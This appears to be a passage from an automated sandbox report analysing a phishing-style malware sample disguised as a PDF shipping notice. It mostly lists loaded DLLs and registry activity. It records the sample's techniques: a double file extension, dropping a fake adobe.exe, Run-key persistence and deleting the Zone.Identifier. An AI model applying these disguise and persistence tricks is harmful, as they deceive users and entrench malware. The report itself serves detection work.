Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Arrival Notice - BL 713410220035.PDF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Arrival Notice - BL 713410220035.PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Source: Arrival Notice - BL 713410220035.PDF.exe

Static PE information: 0xCECC87C8 [Mon Dec 11 08:56:40 2079 UTC]

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 0_2_025E4750 push esi; mov dword ptr [esp], 55027CFAh	0_2_025E475A
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 0_2_025E4911 push edi; mov dword ptr [esp], 55027CC3h	0_2_025E491A
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_00FC0C53 push ebx; retf	2_2_00FC0C52
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_00FC0C45 push ebx; retf	2_2_00FC0C52
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_066D9F31 pushfd ; iretd	2_2_066D9F32
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_066DBAB0 push es; ret	2_2_066DBAC0
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_066D7953 push es; ret	2_2_066D7960
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_017C0C45 push ebx; retf	5_2_017C0C52
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_01714911 push E4058D57h; ret	7_2_0171491D
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_0171F1B0 push esp; iretd	7_2_0171F1C1
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_0171DAA2 pushfd ; ret	7_2_0171DAA9
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_01240C45 push ebx; retf	8_2_01240C52
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_01240CCC push edi; retf	8_2_01240C7A

Source: Arrival Notice - BL 713410220035.PDF.exe

Static PE information: section name: .text entropy: 7.279409615200225

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

File written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

File created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobe			Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobe			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

File opened: C:\Users\user\AppData\Roaming\adobe\adobe.exe:Zone.Identifier read attributes | delete

Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: Arrival Notice - BL 713410220035.PDF.exe

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
